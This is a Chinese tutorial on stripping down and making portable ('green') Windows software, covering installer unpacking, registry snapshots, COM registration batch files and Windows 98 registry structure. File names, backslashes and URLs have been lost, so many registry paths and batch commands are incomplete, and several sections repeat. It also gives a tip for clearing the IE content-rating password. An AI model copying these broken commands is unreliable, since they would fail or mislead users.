绿色软件制作教程——基础篇

绿色软件制作教程——基础篇

1.软件精简与绿化专题之概念篇

现在的软件，功能一个比一个多，个头一个比一个大，安装时间也是超级长，平时还不

觉得，但如果系统重装，那就有的累了，一个系统安装只花半小时 ，但安装常用软件却得

花半天！那么多的功能都是用的到的吗？软件能不能做的小一点？软件就一定要安装后才能

使用吗？带着这些疑问，《家用电脑》在本期推出了软件精简与绿化专题，希望读者们看了

此文后，能够亲自动手，让我们的软件变得更瘦更方便。

2.精简软件的概念

现在的软件越做越大，功能越来越丰富，但是对于很多普通用户来说，许多功能都是根

本用不到的，甚至都不知道存在这些功能，所以很多电脑爱好者就开始研究精简软件的方法，

就是保留大多数常用功能，去掉极少用的功能模块，这样可以极大地减少软件的大小。

比如windows xp，里面有些功能（比如ATM的模块，泰国语言等）对于大多数用户是

多余的，于是nuhi开发了nlite程序，可以把windows xp精简到200M左右，某些爱好者

甚至可以精简到更小。还有xplite，可以精简安装好的xp系统。又比如我们常用的office

软件，同样很多功能都是我们平时用不到，比如office 2003中的DOT NET可编程性支持，

一般的用户可能仅仅需要word程序，如果我们去掉office软件中不太常用的组件，就可以

office system精简到100M甚至几十M，这样可以把一些常用的软件做到一张光盘上，便于

携带。此外，现在很多软件都捆绑了诸如3721，cnnic等插件（比如紫光3.0输入法捆绑了

百度的搜索助手），很多用户都在不自愿的情况下被强制安装了这些插件，如果可以把这些

插件从捆绑的软件中精简掉，就不会有不小心安装的情况了。

一般来说功能模块划分比较清晰的软件，容易精简也可能精简，如果软件的文件相关性

很强，互相依赖，那么就无法精简。

3.绿色软件的概念

安装完操作系统后，我们一般需要安装一些常用的软件，但是随着我们常用软件的增多，

这个安装过程显得越来越令人厌烦：运行setup，然后是选择目标路径，不断的重复这个过

程。即使我们的硬盘上已经安装了这个软件，也要重新安装一次，才能正常使用。那么对于

硬盘上已经存在的软件，能不能不安装而直接运行，仍然可以工作正常呢？

实践证明，按照是否需要重新安装来分类，可以分为3类：

(1) 有一部分软件具有不需安装而可以直接运行的特点。

(2) 还有一部分软件经过改造，可以通过简单的配置而不再需要重新安装就可以正常运行了。

(3) 有些软件必须重新安装才可以正常运行。

一般来说把前2种类型的不需要安装就可以运行的软件称为绿色软件，绿色软件具有如

下优点，对操作系统无污染（恐怕这也是绿色这个名字的由来），不需要安装，方便卸载，

便于携带，可以拷贝到便携的U盘上到处运行。一句话概括就是方便无污染。

制作软件的绿化版本就是手工安装，如果软件的配置过程很简单甚至根本不需要配置，

这个软件就比较容易绿化。如果软件的安装过程比较复杂，甚至要替换操作系统的核心文件，

这时候就不适合做绿化，比如directx。

4.精简软件与绿色软件的关系

我们常常听到“精简绿色版”这个名词，那么精简软件和绿色软件有什么关系呢？

一般说来，精简软件与绿色软件有着以下几种关系：

(1)、仅仅可以精简。有些软件太复杂或者需要替换操作系统模块，不适合绿化。比如

office系统很难绿化，但是由于office安装程序的模块化比较好，很容易找出不需要的组

件，所以容易精简。

(2)、仅仅绿化，有些软件功能很单一，没有多余的功能模块，这时候没有什么可以精

简的，只能绿化。

(3)、绿化并且精简，很多时候，绿化软件的同时对软件进行精简，比如上一期的绿化

msn messanger，为了便于安装和携带，就是对msn messanger同时绿化和精简。一般来说，

绿化的同时伴随着精简，去掉不需要的文件和功能。

(4)、既不能绿化又不能精简，比如directx安装程序。

5.明白安装程序

无论是精简还是绿化都要和安装程序打交道，弄明白了安装程序所作的工作，会极大地

方便绿化和精简。

目前安装程序有4大类型：

(1)、微软的Installer制作的安装包，后缀一般是msi，msp，是基于数据库的概念来

设计的，具有自修复，按需安装，和windows集成等优点，并且微软在极力推广，已经成为

安装程序的标准。目前很多安装制作程序都可以生成msi格式的安装包，老牌的

InstallShield 和 Wise 也推出了基于msi的安装制作程序。微软提供的的windows xp 的

sdk中包含了免费的msi编辑修改等工具。

(2)、Iinstallshield制作的基于InstallShield自身安装引擎的安装包，在windows

installer以前，多数安装程序都是Installshield制作的。使用winpack v3.0可以解码

InstallShield3，5，6引擎的安装包（下载地址：

/down/200516/）。

(3)、Wise制作的基于Wise自身安装引擎的安装包，比installshield小巧，用的也

比较广泛。使用E_WISE（下载地址：/down/200516/e_）

或者使用Wise Unpacker GUI（下载地址：

/down/200516/）可以解码wise软件包。

(4)、inno ，NSIS(Nullsoft),Installer VISE等制作的安装包，也是各有特色。total

comander 有一个插件，叫WCXfar_IETotal，可以直接解压缩如下类型的安装程序：- Wise

- Vise - Inno Setup - Gentee Installer - InstallShield - NullSoft Installer

(ver>=1.10) - SetupFactory - Eschalon - MSI Windows Installer，不过还不是很完善，

速度也比较慢。

6.软件的精简过程

软件的精简就是去掉不需要的功能模块，删除相对应的文件，这里面关键是找出软件中

各不同模块所对应的文件，一般有几种方法：

(1)、分析文件名字和目录，进行推测和实验，删掉或者把某些文件移动到别的目录，

看看软件功能是否受影响，这可以知道各个功能模块所对应的文件了。这个方法适合比较小

巧的软件或者功能划分比较明显的软件（比如adobe acrobat软件，划分为Acrobat，Acrobat

Elements，ActiveX，Designer 7.0，Distillr等几个目录，可以猜测各个目录所对应的功

能模块）。当文件和目录比较多并且没有明确的名字指明模块划分的时候，这种方法就很繁

琐和困难了。

(2)、直接分析安装软件包，比如msi格式的安装包，天生就是按照模块来划分的，使

用msi编辑工具，可以很容易的了解各个模块所对应的文件，所以虽然office 比较复杂，

难以绿化，但是容易精简。这种方法需要比较完善的安装程序包的分析工具。除了msi之外

的大多数安装包的相关分析工具都不太完善。

(3)、快照测试。安装的时候，不要选择某项功能模块安装，记录下这时候的系统快照，

然后安装该功能模块，再一次记录系统快照，对比快照前后的变化，来了解模块和文件对应

关系。

7.软件的“绿化”过程

绿色软件的制作，简称软件的“绿化”，绿色软件的制作实际上就是我们自己完成安装

程序的工作。没有什么固定的方法，基本上是猜测加上试验，不同类别的绿色软件分别有不

同的制作策略。

笔者一般遵循如下步骤制作一个绿色软件：

(1)、判断：猜测这个软件能不能制成绿色软件，从功能，从你对它的了解，如果你觉

得这个软件和系统的关系非常紧密，就不要继续下去了，还是用原始的安装程序最保险最方

便，这样的例子有directx9 ，IE6，Norton的反病毒软件等等。这样的判断可以节省你的

时间，当然你可以忽略这一步，尝试制作绿色软件，那么就转到第2步。

(2)、“绿化”：对于不同的软件有不同的方法，没有一定的规则，但是总的来说，就是

理解软件的安装过程，转换为绿色安装，在这个过程中，可能需要尝试多个方法，也可能最

后由于软件的复杂性或者某些特性，导致无法绿化。要有失败的思想准备，具体的绿化方法

随后讲述。

(3)、测试：“绿化”后的测试最好到一个全新安装的操作系统中测试，如果你要在多个

操作系统中使用这个软件，还要在其它的操作系统中测试，有些软件的文件随着操作系统的

不同而不同，这个时候你需要在不同的操作系统中进行”绿化“过程，最后综合为一个完整

的适应多操作平台的绿色软件。

“绿化”方法，需要根据经验选择不同的“绿化”方法，也可能需要不断尝试不同的方

法，直到成功为止。按照先易后难的次序，具体的方法包括：

1、解压缩。

2、安装然后卸载。

3、反编译安装程序。

4、观察反安装程序和log文件。卸载是安装的逆过程，如果知道怎么卸载，那么也可以推

测出如何安装。

5、比较系统快照。就是首先在安装软件之前，把系统的状态记录下来，主要包括注册表和

系统目录的所有的文件状态。然后就是安装软件。安装完成后，再一次记录系统状态。最后

就是比较前后两个系统状态的不同，而得知安装程序所做的工作。 通过上面分析安装程序

的动作，把安装程序的工作分解为复制文件，注册COM组件，安装服务驱动，注册表配置等

几个部分，把这些明显分割出来有助于制作绿色安装的软件。对于需要更复杂的步骤来安装

的软件，还是使用原来的安装程序比较保险。

（一）绿色软件的定义、分类、绿化

安装完操作系统后，我们一般需要安装一些常用的软件，但是随着我们常用软件的增多，

这个安装过程显得越来越令人厌烦：运行setup，然后是选择目标路径，不断的重复这个过

程。后来我见到有人制作所谓的绿色软件，不需要安装，感觉很方便。当时很好奇，想知 道

怎么做的，有没有什么方便的工具等等，可是在网上没有找到什么相关的知识，随着自己的

一步步摸索，我逐渐积累了一些经验和比较有效的方法，在这里提供给大家。

首先要先弄清楚何谓绿色软件？其定义是什么？我收集了一些网友的讨论和想法：

A 说，不需要安装 同时 不向注册表写入任何东西

B 说，应该还包括不向系统文件夹拷贝文件，我的理解就是：安装这个软件对现有的操

作系统没有任何改变，改变包括写注册表之类的。

C 说，除了你现在安装的目录，应该不往任何地方写东西（比如log）。

D 说，免安装，并且 不往程序所在目录以外的任何地方产生垃圾文件，还有 不写注册

表

E 说，综上加一条，可以放在移动存储器上在任一电脑上使用且效果相同。

F 说，好像不写注册表，直接copy来就可以用得就算吧。

G 说，重新安装系统的时候，仅需导入注册表，不需重新安装，就可以认为是绿色软件。

H 说，其实只要不写注册表、不往系统文件夹写文件，哪怕需要.ini文件也在软件自己

的目录里就行，那么就可算作绿色软件，特征是能够任意copy到别的文件夹照样能用或重装

系统后直接能用，没有其它变化。所以有小部分“安装”的软件其实也符合绿色软件，因 为

它 的安装只是解压缩建立文件夹而已。

I 说，基本同意，但不写注册表的几乎是不可能，你只要运行过那个软件，打开注册表

编辑器HKLM和HKLU下面software看看，几乎都会留下键值，其实这样也应该叫做绿色的吧。

综合上面的意见，可以总结出绿色软件的优点，就是对操作系统无污染（恐怕这也是绿

色这个名字的由来），不需要安装，方便卸载，便于携带，可以拷贝到便携的U盘上到处运行。

我的意见是，绿色软件应该分类，分为狭义的绿色和广义的绿色：

狭义的绿色可以叫做纯绿色软件，就是指这个软件对现有的操作系统部分没有任何改变，

除了软件现在安装的目录，应该不往任何地方写东西，删除的时候，直接删除所在的目录就

可以了，就类似于以前的大多数DOS程序。

广义的绿色就是指不需要专门的安装程序，对系统的改变比较少，手工也可以方便的完

成这些改变，比如拷贝几个动态库，或者导入注册表，这里的关键是手工可以方便的完成这

些改变，或者可以借助于批处理等等脚本完成。

为什么要分为两类？虽然狭义的绿色软件最为理想，但是完全符合这种定义的软件非常

罕见，而相当多的软件可以划分到广义的绿色这个类别，这样包括了广义的绿色软件的概念

后使得绿色软件这个概念更有意义。

那么不符合绿色软件要求的有哪些呢？主要是指那些和操作系统联系和集成非常紧密

的软件，这些软件不适合制成绿色软件，最好还是用原来的安装程序来安装。如IE6，替换

了系统中的许多动态库，手工完成这个过程很困难，也不太安全。又比如大多数杀毒软件，

如果 必须实时监控系统的底层运作，对系统的修改比较大，就不适合做成绿色软件。还有

微软公司的Office系列软件，和系统集成的也比较紧密。但是广义的这个标准比较灵活，如

果有人搞清楚了Office系列软件的安装制作过程，也有可能制作出广义的绿色的Of fice系

列。

为了充分理解绿色软件的定义，必须从现代软件的安装过程和运行过程两个方面来讨论。

安装过程：以前在dos下面的时候，就没有这些所谓绿色软件的说法，原来程序的安装

基本上都是简单的复制或者解压缩，然后配置一下 和文件就可以

了。随着windows的发展，应用软件也越来越大，也越来越复杂，从而有公司专门从事安装

程序的制作，如InstallShield就是一款比较有名和应用比较广泛的安装软件，现在windwos

也有了专门的安装程 序，就是Microsoft Installer。安装程序的作用是什么呢？主要是为

了给要安装的程序提供一个简单方便的设置环境，而不需要用户手工完成这个步骤，越是复

杂的配置过程，对系统的修改越多，对安装程序的依赖性就越高，Windows程序的易学易用

的优点和良好的安装界面 是分不开的，安装软件的任务就是给应用程序提供一个初步完好

的可以运行的环境，而不需要用户进行手工配置。

运行过程：应用程序启动的时候，从注册表或者配置文件中读取配置，运行的时候，可

以修改配置，但这个修改一般是在安装软件所作工作的基础上进行的，例如不能改变应用程

序的安装位置了。

明白安装过程和运行过程的区别后，很容易就想到把绿色软件的使用按照这两个阶段分

为绿色安装过程和绿色运行过程。绿色安装是绿色运行的前提，没有绿色安装，也就说不上

什么绿色运行了，绿色软件首先必须是绿色安装，我前面提到的不适合绿色软件标准的基本

上都 是不能绿色安装的。

绿色安装的基本含义，我认为可以也可以分为狭义的和广义的绿色安装：

1 狭义的绿色安装就是指直接拷贝或者解压缩到目标目录，不需要向系统目录拷贝也不

需要写入注册表，这是最理想的情况，或者是安装程序的作用除了解压缩外是可以忽略的，

如在开始菜单加入快捷键等对系统和软件的运行没有太大影响的操作，也就是说安装过程的

作用就 是复制文件到目标文件夹。

2 广义的绿色安装就是指在狭义的复制的基础上，必须向系统目录拷贝一些动态库，或

者要在注册表中导入必要的设置，或者要进行一些其他的配置，否则的话，应用程序不能运

行，而且这个配置工作应该比较简单，也容易撤销这些操作对系统的改变。

同样，绿色运行也可以分为狭义的和广义的绿色运行：

1 狭义的绿色运行指的是软件运行时完全不改变操作系统的文件和配置--很多小程序

属于这个类别，或者运行结束后把撤销对系统的改变，比如运行的时候加载一个驱动程序，

退出时卸载该驱动程序，所操作的INI文件在自己的程序目录中。

2 广义的绿色运行指的是可以通过程序本身来改变当前的设置，如改变当前软件的运行

方式，或者与某些文件后缀相关联，或者在注册表中留下当前的软件设置，也就是说对系统

的注册表有永久的改变，但是这些改变都是应用程序自己完成的，不需要借助其他程序或者

用手工 完成。

综合绿色安装和绿色运行，可以把绿色软件细分为：

1 狭义的绿色安装，同时是狭义的绿色运行的软件，对操作系统没有任何改变。

2 狭义的绿色安装，广义的绿色运行的软件，软件的配置工作由软件本身来完成，不是

通过安装程序。

3 广义的绿色安装，狭义的绿色运行，软件的配置工作由安装程序来完成，软件本身不

能对配置修改，同时如果没有配置工作，软件无法正常运行。

4 广义的绿色安装，广义的绿色运行，最复杂的一种绿色软件，软件的配置工作由安装

程序来完成，但是软件本身可以对配置 修改，同时如果没有配置工作，软件无法正常运行。

只有第一个类别属于我说的狭义的绿色软件，其他3类都属于广义的绿色软件的范畴。

下面讲一下绿色软件的制作，简称软件的“绿化”，绿色软件的制作实际上就是我们自己

完成安装程序的工作。没有什么固定的方法，基本上是猜测加上试验，不同类别的绿色软件

分别有不同的制作策略。

拿到一个新的软件，想要制成绿色软件的话，我一般遵循如下步骤：

1 判断。就是指猜测这个软件能不能制成绿色软件，从功能，从你对它的了解，如果你

觉得这个软件和系统的关系非常紧密，就不要继续下去了，还是用原始的安装程序最保险最

方便，这样的例子有directx9 ，IE6，Norton的反病毒软件等等。这样的判断可以节省你的

时间，当然你可以忽略这一步，尝试制作绿色软件，那么就转到第2步。

2“绿化”。对于不同的软件有不同的方法，没有一定的规则，但是总的来说，就是理解

软件的安装过程，转换为绿色安装，在这个过程中，可能需要尝试多个方法，也可能最后由

于软件的复杂性或者某些特性，导致无法绿化。要有失败的思想准备，具体的绿化方法随后

讲 述。

3 测试。”绿化“后的测试最好到你个全新安装的操作系统中测试，而且如果你要在多个

操作系统中使用这个软件的话，还要在其他的操作系统中测试，有的软件的文件随着操作系

统的不同而不同，这个时候你需要在不同的操作系统中进行”绿化“过程，最后综合为一个完

整 的适应多个操作平台的绿色软件。

“绿化”方法，需要根据经验选择不同的“绿化”方法，也可能需要不断尝试不同的方法，

直到成功为止。按照先易后难的次序，具体的方法包括：

1 解压缩。这是最简单的一种方法，就是指尝试能不能直接解开软件的压缩包。用Winzip

和Winrar试一试，看看能不能直接打开压缩的安装文件，如果不能打开，那么就换别的方法。

如果可以，那么恭喜，这个软件多半是属于绿色安装的软件（有个别例外，如E mEditor），

把压缩包中的文件直接解压到目标路径，然后测试软件的功能是否正常，如果功能正常，那

么“绿化”就成功了，如果使用不正常，那么就换别的方法。这一类软件的特点是安装程序的

工作完全可以由软件自身来完成。

2 安装然后卸载。也是比较容易的方法，完全是体力劳动，就是指直接安装这个软件，

然后把程序复制出来，最后卸载安装程序。如果这个软件的安装程序的作用仅仅是复制文件

和生成快捷键等工作，那么就属于绿色安装，可以使用这个方法。最后测试软件的功能是否

正常， 如果功能正常，那么“绿化”就成功了，如果使用不正常，那么就换别的方法。

3 反编译安装程序。这个方法需要动脑筋，就是根据安装程序所用的制作工具，选择相

应的反编译程序，然后阅读反编译出的安装脚本，制作绿色软件。目前的软件大多使用专门

的安装工具制作，如InstallShield，Wise，Inno Setup，Windows Installer，

NSIS(Nullsoft),Installer VISE,其中Windows Installer格式的安装文件（就是MSI，MST

为后缀的文件），可以通过微软的免费工具Orca打开查看，InstallShield格式的安装文件也

有很多免费的工具可以解压缩和查看脚本。当然专门的安装工具很多，有许多安装程序没有

相应的反编 译程序，这种时候，就无法使用这个方法了。

4 观察反安装程序和log文件。现在的软件安装完成后绝大多数都带有卸载方法。卸载

是安装的逆过程，如果知道怎么卸载，那么也可以推测出如何安装。由专门的安装工具制作

的反安装程序，一般都是根据某一个文件中的信息来卸载的，可以用一个纯文本的编辑器打

开这 个文件。个别情况下这个文件完全不包含可读信息，就只好换用其他方法了。具体过

程就是先采用方法2，然后理解反安装过程，最后根据反安装的信息制作绿色软件。

5 比较系统快照。当前面的方法都失败的时候，可以试一试这个方法。具体思路就是首

先在安装软件之前，把系统的状态记录下来，主要包括注册表和系统目录的所有的文件状态。

然后就是安装软件。安装完成后，再一次记录系统状态。最后就是比较前后两个系统状态的

不同 ，而得知安装程序所做的工作。这个工作一般由专门的软件完成，如免费工具Regshot，

免费工具inctrl5（/article2/??者WinInstall LE（在

Windows 2000 Sever 光盘的目录VALUEADD3RDPARTYMGMTWINSTLE中）。在多数时候，仅

仅需要对比安装前后注册表的不同，这时候还有大量的注册表工具可以选用。在得出系统差

异后，把差异分解为两个部分：文件部分和注册表部分。文件部分指的是向系 统目录拷贝

的文件，以及作为COM组件注册的文件，还有与这些文件相关的注册表部分。注册表部分单

单指其余的注册表的变化。对于文件部分，可以进一步区分出必须要往系统目录拷贝的文件

（这种情况是少数）和可以放在软件的安装目录的文件。对于注册表部分，区 分出由这个

软件的安装程序本身所作出的注册表操作和注册COM组件时候的注册表操作，抛弃其他程序

（如资源管理器Explorer）的操作。根据所有这些，写一个拷贝文件，注册COM组件和导入

注册表的批处理文件，就可以完成绿色软件的制作了。当注册表文 件中含有路径信息的时

候，可以手工修改注册表文件或者把注册表文件转化为INF文件从而实现全自动的路径处理。

6 直接导出注册表，寻找自注册的COM组件。这个方法是上面的方法5的简化版，现在软

件的配置大多写在注册表中的“HKEY_LOCLAL_MACHINESOFTWARE软件公司名字”和

“HKEY_CURRENT_USERSOFTWARE软件 公司名字”这2个键下面，直接对把这2个注册表键导出

到REG文件中。自注册的COM组件都需要导出如下4个函数：DllCanUnloadNow，

DllGetClassObject，DllRegisterServer， DllUnregisterServer，可以用vc自带的

找出哪一个动态链接库是自注册的COM组件。最后写一个批处理文件用

注册COM组件和用导入注册表。

通过上面分析安装程序的动作，把安装程序的工作分解为复制文件，注册COM组件，安

装服务驱动，注册表配置等几个部分，虽然注册表配置可以覆盖注册COM组件，安装服务驱

动等操作步骤，但是把这些明显分割出来有助于制作绿色安装的软件。对于需要更复杂的步

骤来安装的软件，还是使用原来的安装程序比较保险。

对于每个方法，下面我会给出具体的例子，有些时候，需要几个方法联合使用，无论使

用什么方法，都是模拟原来的软件作者的安装过程，所以原作者最容易给出该软件的绿色版

本。

winrar3.30 和Winzip9.0，采用方法1，解压缩。这个方法非常简单，从天空软件站下

载和，在一个安装了Winrar的系统上，用鼠标右键选择下载

的文件，运行右键菜单中的用Winrar打开的命令，然后 把文件解压到我们的目标路径，如E：

tools目录，就可以了。然后分别对Winzip9和Winrar进行设置就可以了。运行winzip9目录

中的，进行winzip的设置。Winrar也是一样，运行 ，打开菜单选

项-〉设置，弹出一个对话框，选择标签--集成，如图，逐项对Winrar

设置。当拷贝到U盘而到新的机器上运行时，需要重复这些设置过程。

这一类软件的特点是安装程序的工作完全可以由软件自身来完成，从而完全抛开安装程

序，或者说安装程序的工作也就是解压缩。类似的软件还有一些，最简单的测试办法就是看

看Winrar能否直接打开压缩的安装程序。也可以采用方法2，过程基本上和方法1一样。

方法2就不具体说明了，仅仅指出有许多程序属于这个类别，如Myie2，GreenBrowser，

qq，BPFTP Server，IDA_Pro_Standard_4.5.1.770，FinalData，EASYRECOVERY 6.03，腾逊

公司的TM等等。

flashget是大家用得比较多的一个软件，可以多线程下载并且下载管理的功能也很方便，

从天空软件站下载flashget1.60a国际版，运行一下，如图flashget_，然

后取消安装。从图上可以看出flashg et1.60a国际版是使用Wise制作的安装程序，从网上下

载wungui程序，非常容易的把安装程序解压缩到一个目录中，如图，观察

Maindir目录，其中有两个DLL文件和fgiebar. dll，进一步察看这两个动态库

文件的导出函数，可以知道这两个DLL文件都是自注册的COM组件，写一个批处理文件

来注册这两个DLL：

REGSVR32 /s

REGSVR32 /s

经过测试，功能正常，并且可以从浏览器IE中用鼠标的右键菜单激活flashget，功能完

全，下面考虑卸载过程。

运行，发现flashget在注册表中的路径是

[HKEY_CURRENT_USERSoftwareJetCarJetCar]，写一个注册表文件删除这

个路径，如下：

REGEDIT4

; flashget

[-HKEY_CURRENT_USERSoftwareJetCarJetCar]

同时写一个批处理文件来卸载这两个DLL文件并导入：

Regedit /s

REGSVR32 /s /U

REGSVR32 /s /U

随后就是删除一些我们用不到的文件，比如language目录的绝大多数欧洲的语言文件，

这时候这个绿色版本就做好了。把制作好的绿色的flashget拷贝到U盘上，需要用的时候，

直接执行里面的文件就可以了（注意，要在flas hget的目录运行批处理文件），

不需要任何文件拷贝。

我看到有人提到用优化大师提取falshget的注册表，然后直接导入注册表来制作绿色的

flashget，这样做是不行的，从我前面的步骤来看，注册2个DLL文件必然在注册表中引入了

绝对路径，那么如果直接提取注册表的话，就必须根据当前的路径来修改 注册表中的路径，

否则的话制作的绿色版的flashget只能在固定的目录运行。在制作flashget绿色版的时候，

我同时使用了方法3和方法6，使用方法3的目的就是避免安装程序对系统作的修改，这样可

以直接在当前系统进行测试，而不需要到另外一个没 有安装过flashget的系统测试。

从以上的事例中，可以看出，方法2和方法1基本一样，只不过方法1我们使用WinRar解

压缩，而方法2我们使用安装程序解压缩。方法6可以说是方法5的简化版本，方法3和方法4

也可以辅助方法5，也有一些需要联合应用这些方法，有时候难以判断到底使用了 那个方法，

方法是死的，需要灵活运用，有些时候需要不断试验。

我简单说几个软件“绿化”时候使用的方法，某些软件可能有多种“绿化”方法，然而最后

的结果基本一样：

使用方法1就不提了，只要没有专门的安装程序，直接以zip形式发布的，都使用方法1。

CuteFTP,Flashfxp,qq，foobar ，winamp2.8,acrobat，FinalData ，金山词霸 ，

ZoomPlayer，WinISO ，IsoBuster，WinISO ，MIRC，WinCVS,Photoshop6 ，EASYRECOVERY 6.03，

网易泡泡使用方法2。

VisualC++ 6， real player，realmedia的解码器包，大部分解码器如vp6，mpeg2，ac3 ，

ogg ，divx ，xvid 使用方法5。

Netants ，flashget，OfflineExplorer acdsee，ultraedit ,IBM词典，theBat，网文

快捕，和现在的CyberArticle，PartitionMagic7 使用方法6。

不适合“绿化”的有Directx9，Mediaplayer9，IE6，微软的补丁程序，Office2003，反

病毒工具NAV，Java虚拟机，虚拟机VMware等等，其中有些是不知道如何“绿化”或者说比较

困难，如Office 2003，我认为那种把Office安装到硬盘上，然后抽去注册表的变化的方法

部叫做“绿化”，因为注册表文件中有大量的绝对路径存在，而且Offcie的组件之间有比较复

杂的联系，所以难以“绿化”。有些是“绿化”没有意义，如IE6，微软的补丁程序， Directx9

等等。

目前我使用的软件，绝大部分都“绿化”了，只有少数几个必须安装了，如 MS Office，

Visual 2003等等。感觉非常方便，尤其是改变盘符的时候，非常简单，可以做

到便携化。

（二）了解注册表结构

在Windows98的注册表中，所有的数据都是通过一种树状结构以键和子键的方式组织起

来，就象我们的磁盘文件系统的目录结构一样。每个键都包含了一组特定的信息，每个键的

键名都是和它所包含的信息相关联的。如果某个键包含了子键，则在注册表编辑器窗口中代

表这个键的文件夹的左边将有“＋”符号，以表示在这个文件夹中有更多的内容。如果这个文

件夹被用户打开了，那么这个“＋”就会变成“－”，我们可以象打开文件夹一样层层的打开注

册表树，当然我们有时并不清楚我们要找的键在哪个目录分支下面，我们就得搜索相应的关

键字。我们来看看注册表树最顶层的六个分支所分别代表的含义，这样我们在修改的时候就

可以做到心中有数了。

_CLASSES_ROOT管理文件系统。根据在Windows 98中安装的应用程序的扩展名,

该根键指明其文件类型的名称，相应打开该文件所要调用的程序等等信息。

_CURRENT_USER管理系统当前的用户信息。在这个根键中保存了本地计算机中存

放的当前登录的用户信息,包括用户登录用户名和暂存的密码。在用户登录Windows 98时，

其信息从HKEY_USERS中相应的项拷贝到HKEY_CURRENT_USER中。

_LOCAL_MACHINE管理当前系统硬件配置。在这个根键中保存了本地计算机硬件配

置数据,此根键下的子关键字包括在中,用来提供HKEY_LOCAL_MACHINE所需的信

息,或者在远程计算机中可访问的一组键中。

这个根键里面的许多子键与文件中设置项类似。

_USERS管理系统的用户信息。在这个根键中保存了存放在本地计算机口令列表中

的用户标识和密码列表。同时每个用户的预配置信息都存储在HKEY_USERS根键中。

HKEY_USERS是远程计算机中访问的根键之一。

_CURRENT_CONFIG管理当前用户的系统配置。在这个根键中保存着定义当前用户

桌面配置(如显示器等等)的数据,该用户使用过的文档列表（MRU），应用程序配置和其他有

关当前用户的Windows 98中文版的安装的信息。

_DYN_DATA管理系统运行数据。在这个根键中保存了系统在运行时的动态数据，

此数据在每次显示时都是变化的，因此，此根键下的信息没有放在注册表中。 这些键值项

数据可分为如下三种类型：

1.字符串值（S）在Windows98的注册表中，表示文件的描述、硬件的标识等等信息一般

都用字符串值。字符串值由字母和数字组成，它的最大长度不能超过255个字符。通过键、

键值就组成了一种键值项数据，这就相当于、文件中每个小节下面的设

置行一样的道理。

2.二进制值（B）在Windows的注册表中，二进制值是没有长度限制的，可以是任意个字

节长。在注册表编辑器中，二进制以十六进制的方式显示出来。

值（D）在Windwos98的注册表中，DWORD值是一个32位（双字节长）长度的数值。

在注册表编辑器中，系统以十六进制的方式显示DWORD值。

在修改中这么多子键并不一定都用得作，其中对我们最有用还是 HKEY_LOCAL_MACHINE

和 HKEY_USERS这两个键下面的子键：

我们先看看 HKEY_LOCAL_MACHINE键先面的几个重要的子键及其作用：

1）HKEY_LOCAL_MACHINEsoftwaremicrosoftwindowscurrentVersionuninstall 保

存Windows98系统中已经安装了的Windows应用程序卸载信息。

2）HKEY_LOCAL_MACHINEsystemcurrentControl-Setcontrolkeyboard Layouts 保

存Windows98中键盘使用的语言以及各种中文输入法的信息。

3）

HKEY_LOCAL_MACHINEsoftwaremicrosoftwindowscurrentVersionexploreruser

shell folders 保存计算机中个人文件夹、收藏夹的路径。

4）HKEY_LOCAL_MACHINEsystemCurrentControl-Setservicesclass 保存控制面板-

增添硬件设备-设备类型目录，全面管理你的硬件信息。

5）HKEY_LOCAL_MACHINEsoftwaremicrosoftwin-dowscurrentVersionrun 保存由

控制面板设定的计算机启动时运行程序的名称，其图标显示在任务条右边。这也是我们经常

修改和用到的一个目录。

6）

HKEY_LOCAL_MACHINEsoftwaremicrosoftwindowscurrentVersionPoliciesRatings

保存了IE的“安全”“分级审查”中设置的口令(数据加密),若遗忘了口令,删除 Ratings 中

的数据即可解决问题。

7）

HKEY_LOCAL_MACHINEsoftwaremicrosoftwindowscurrentVersionexplorerdesktopn

ameSpace 保存桌面中特殊的图标,如回收站、收件箱、网上邻居等等，你可以把它改得面目

全非，人家都认不出来。

先面我们再来看看另外一个重要的键HKEY_USERS下面的重要分支：

1）

icrosoftwindowscurrent-VersionexplorerRunMRU保存

“开始 运行...”中运行的程序列表信息。清除文档菜单时该分支将被清空。

2）HKEY_tsoftwaremicrosoftinternet explorertypeURLs保存

IE4.0浏览器地址栏中输入的URL地址列表信息。清除文档菜单时它也将被清空。

3）

icrosoftwindowscurrent-VersionexplorerRecentDocs

保存最近使用的十五个（数目是可以修改的）文档的快捷方式，清除文档菜单时将被清空。

4）HKEY_tsoftwaremicrosoftwindowscurrentVersionapplets 保

存Windows98应用程序的记录数据信息。

在上面我们大致介绍了Windows98的注册表的结构和重要的信息，这对于我们修改注册

表是非常有用的。

（三）对注册表进行编辑的三种途径

了解了关于注册表的基本内容之后，我们就可以正式进入我们所要讨论的话题了：对注

册表进行编辑修改!一般来说，要想对注册表进行增、删、改，可以有以下三种途径：

第一种途径：直接修改(最不安全，但最直接最有效)就是通过注册表编辑器直接的来修

改注册表的键值数据项，这样做会避免在注册表中留下垃圾(虽然都很小，但越来越多会拖

慢系统速度)，但是要求用户有一定的注册表知识，熟悉注册表内部结构而且一定要小心谨

慎。

注册表编辑器是一个可以让你改变系统注册设定的高级工具WIN98注册表编辑器的常用

操作注册表编辑器是一个可以让你改变系统注册设定的高级工具，有经验的Windows用户可

以通过编辑注册表改变系统设定。

启动注册表编辑器的方法是执行Windows文件夹下的(在WINNT和Windows

2000中还有)。

下面详细介绍Win98注册表编辑器常用的操作。

(一)、恢复注册表1.单击“开始”，再单击“关闭系统”；2.单击“重新启动计算机并切换

到MS－DOS方式”，然后单击“是”；3.进入Windows目录下。例如，如果你的Windows安装在

C:Windows目录下，应键入以下内容CD C:WINDOWS后回车；4.在MS－DOS模式下键入

C:WINDOWSCOMMANDSCANREG/RESTORE后回车。

按照上述步骤，可以将注册表恢复到最后一次启动计算机时的状态。

(二)、将注册表中的所有内容导出到一个文本文件中1.在注册表编辑器中单击“我的电

脑”将导出所有注册表信息，或者单击一个文件夹仅仅导出该文件夹下内容的注册信息；2.

在“注册表”菜单上单击“导出注册表文件”；3.单击“浏览”为导出的文件寻找一个存储位置，

即文件夹，然后为之输入一个文件后保存。

这样导出的注册表信息文件，可以在任何一种文本编辑器中编辑。

(三)、导入或局部导入注册表1.在“注册表”菜单中，单击“导入注册表文件”；2.单击“浏

览”找到要导入的文件，然后单击“打开”。

(四)、添加主键1.打开注册表列表，找到要添加主键的文件夹；2.右击要加入主键的文

件夹；3.将鼠标指向“编辑”菜单下的“新建”，然后单击“主键”；4.新的主键是以一个临时名

字显示的，为新的主键输入一个名字，然后回车即可；如果添加新的主键后，导致了计算机

不能正确启动的情况，可以恢复注册表信息。

(五)、添加键值1.打开注册表列表，选中要添加新键值的文件夹；2.右击要添加新键值

